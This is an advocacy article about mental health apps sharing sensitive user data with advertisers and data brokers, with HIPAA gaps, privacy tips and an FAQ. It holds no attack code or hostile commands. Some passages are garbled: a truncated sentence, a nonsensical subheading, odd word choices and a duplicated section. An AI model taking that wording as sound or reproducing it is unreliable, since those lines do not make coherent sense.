Your Therapy App Might Be Whispering Your Secrets to Advertisers: How to Protect Your Mental Health Data
Introduction: When Your Digital Safe Space Isn’t So Safe
Picture opening up to your therapist about your deepest fears and traumatic memories. Then you hear that those secrets, much of which were shared in confidence, may go to some faceless corporation to make a few bucks on the side. It feels unforgivable, doesn’t it? Unfortunately, that’s what’s happening for people using some of the most popular mental health apps.
As a scholar in digital health privacy and advocate for ethical tech, I lose sleep over this trend. Apps like BetterHelp and Talkspace can provide comfort and support, or we may reach for a mood tracking app when we’re feeling anxious. The convenience and other benefits of these tools are not in doubt. But there is increasing evidence that for some platforms, user data — particularly sensitive data — is treated irresponsibly. Here’s a look at what’s happening, why it matters and most
The Ugly Truth: Data Sharing in the Marketplace of the Mental Health App
The Case is Strong: You’re Not Being Sized Up
1. FTC Actions Speak Loudly:
In 2023, BetterHelp reached a settlement with the Federal Trade Commission (FTC) requiring the company to pay $7.8 million for sharing consumers’ health data — which comprised sensitive mental health data about consumers’ struggles — with third parties like Facebook and Snapchat for advertising purposes (in violation of their promise to keep such information confidential.The FTC alleged they revealed users’ email addresses, IP addresses, and health questionnaire responses.
Independent researchers from the Mozilla Foundation have often pointed out that several major mental health and prayer apps should be warned with “Privacy Not Included” labels. Their investigations found that apps are sharing personal data such as mood logs, journal entries, medication names, and how often sessions happen with many advertisers and data brokers, like Facebook/Meta, Google, AppsFlyer, and Braze.
The Pixel Problem: The widespread use of tracking pixels (like the infamous Meta Pixel) on therapy platforms and even hospital patient portals is a significant culprit. These snippets of code can capture URLs visited, button clicks, and even form field entries (like answers to intake questionnaires about depression or anxiety) before the user hits “submit.”
How Does This Data Sharing Actually Work? (The Technical Creepiness)
It’s rarely as blatant as an app emailing your session transcript to an ad agency. It’s more insidious:The Data Brokers: Apps often send data to “middlemen” – data aggregators and brokers. These companies build intricate profiles by combining data from many sources (apps, websites, loyalty cards, public records).
Building Your “Invisible” Profile: Even if your name isn’t attached directly to your therapy session frequency, data brokers can link your device ID, IP address, or email to create a profile labeled something like “User ID XZY123.”
Inference is Key: Advertisers don’t necessarily see “User XZY123 had a therapy session about anxiety on Tuesday.” Instead, they see signals: “User XZY123 visited a mental health app daily, spent 45 mins per session, filled out a PHQ-9 depression screening scoring ‘severe,’ and recently searched for ‘panic attack symptoms’.” This is more than enough to infer sensitive mental health conditions.
The Ad Targeting: This supposition is in turn used to target you with some very specific and often intense ads. Well most likely what’s getting targeted are advertisements that fall more on the fear-mongering and demonic type: antidepressants, other “natural” therapy services, “miracle” cures, or products that exploit your “weak” nature. You might see messages such as, “Feeling lonely and want to chat?”
Why is This Such a Big Deal? Beyond “Just Ads”
HIPAA Loopholes: This is critical. The Health Insurance Portability and Accountability Act (HIPAA) provides strong privacy protections – but only for specific “covered entities” (like your doctor’s office, hospital, or a traditional health insurer). Many mental health apps, especially those acting purely as platforms connecting users to therapists (and not providing the therapy directly as employees), argue they fall outside HIPAA.They operate under general consumer privacy laws.These laws are more permissive and less grudging and are more prone to securing swiss cheese laws as it pertains to data-selling and data-analytics permission.
Chilling Honesty Effect: in light of being afraid the sale of their data, users are likely to keep essential things from their therapist, rendering therapy, for no apparent reason, ineffective or, at worst, detrimental. Trust is the foundation of the therapeutic relationship.
Discrimination Risk: Although it’s illegal to discriminate based on health status in many areas like employment and insurance, leaked data could be misused in harmful ways. This includes targeted predatory lending, housing discrimination, or social stigma.
Exploitation of Vulnerability: Using deeply personal mental health struggles to sell products is ethically repugnant. It preys on individuals when they may be least equipped to critically evaluate advertising.
Protecting Your Sanctuary: Practical Steps for Safer Use
Don’t despair! You can use digital mental health tools more safely with vigilance:
Scrutinize Privacy Policies (Look for These Red Flags):
“Third-Party Sharing for Marketing/Advertising”: This is a major warning sign.
- Protecting Your Sanctuary: Practical Steps for Safer UseDon’t worry! You can use digital mental health tools more safely by staying alert.Scrutinize Privacy Policies (Look for These Red Flags):
“Third-Party Sharing for Marketing/Advertising”: This is a major warning sign.
Vague “Business Purposes” or “Analytics”: Ask for details. What data do they collect? Which third parties get this data? How do they use it?
Lack of Clear HIPAA Compliance Statement: If HIPAA applies to them, they should say so clearly. Look for direct phrases like “We are a HIPAA-covered entity” or “We follow HIPAA security and privacy rules.” If they mention “HIPAA-compliant when necessary” or avoid the topic, be careful.
Data Retention Policies: How long do they keep your chat logs or journal entries? Can you delete them permanently?
Cannonball Your Device and App Permissions:
Limit Ad Tracking: iOS: Settings > Privacy & Security > Tracking. Turn off “Allow Apps to Request to Track” on Android by going to Settings, then Privacy, and finally Ads Choose to opt-out of Ads Personalization. By limiting ad tracking, it becomes more difficult for apps to follow your data on multiple platforms.
Review App Permissions: Does a mood tracker really need access to your contacts, location or camera? If you don’t feel the app needs that permission, deny it. Use Strong, Unique Passwords and Enable Two-Factor Authentication: That will protect your account from being hacked. Be Strategic About What You Share (Within the App): Pseudonyms? If the app allows it, and if doesn’t interfere with payment or communicating with your therapist, go with a nickname.
Avoid Linking Social Media: Don’t log in with Facebook or Google if you’ve got that option. Make a separate account.
Think Before You Type: When there are deep privacy concerns, be careful about using extremely sensitive identifiers in text chats or journals, when possible.
Investigate & Pick Wisely:
– Identify Pro-Privacy Stances: Look for apps that say they do not sell or share data for advertising purposes. Also notice if there are endorsements from privacy organizations (but be skeptical).
– Paid vs. Free: Apps that do not charge you are almost always dependent on advertising revenue and will be sharing your data more likely than paid subscriptions which can often have privilege privacy models (but double check!).
– Ask Your Therapist: If you are using an app with a therapist’s name it is worth asking them if they know the platform’s privacy practices and, data security. They should know and care.
– Use Alternatives: Using open-source applications (where the code can be investigated), or apps that clarify local data storage solutions (where the data just stays on your device), such as Bearable (symptoms-tracking) or Moodflow (mood journal), can provide more privacy. In-person traditional therapy remains the best private option.
Conclusion: Demand Better, Protect Yourself
The ease of using mental health apps shouldn’t mean we lose our basic privacy and respect. Sharing the intimate details of our therapy sessions or mental health struggles with advertisers isn’t just a privacy violation; it’s a betrayal of the therapeutic relationship itself.
As users, we need to stay informed, watchful, and speak up. Demand transparency from the apps you use. Read the fine print. Choose platforms that put your privacy first. Support regulatory efforts to close the loopholes that allow this exploitation.
Your mental health journey is deeply personal. You deserve tools that support you without secretly profiting from your vulnerability. Protect your inner world – it’s worth it.
FAQ: Your Burning Questions Answered
“Are all mental health apps sharing my data?”
No, absolutely not. Many reputable developers prioritize user privacy and operate ethically. The key is research. Don’t assume guilt, but don’t assume innocence either – verify.
“If they ‘anonymize’ the data, is it safe?”
Often, no. True anonymity is incredibly difficult to achieve with rich behavioral and health data. As shown in numerous studies, “anonymized” datasets can often be re-identified when combined with other available information. “De-identified” data used for advertising is rarely truly anonymous in a protective sense.
“Can my employer or health insurance company get this data?”
Directly from the app? Unlikely, unless required by law (which is rare for therapy notes). Indirectly? Potentially, yes. If data brokers sell segments like “individuals with high anxiety scores” and your employer buys marketing data for “employee wellness” targeting, your inferred status could be part of a larger pool. There’s also risk if the app suffers a data breach.
“I think my data was shared improperly. What can I do?”
Contact the App: Demand an explanation and deletion of your data.
File a Complaint:
FTC (US): ReportFraud.ftc.gov
Your State Attorney General: Many have consumer protection divisions.
HHS Office for Civil Rights (OCR): If you believe HIPAA was violated (e.g., by a covered entity therapist using a non-compliant app). HHS.gov/OCR
GDPR (EU/UK): Contact your national Data Protection Authority (DPA).
“Is texting my therapist directly safer than using an app?”
Potentially, but not foolproof. Standard SMS texting is generally not encrypted and offers minimal privacy. Encrypted messaging apps (like Signal) are far more secure for direct communication, but ensure your therapist agrees and understands how to use it securely. Verify their preferred secure communication method.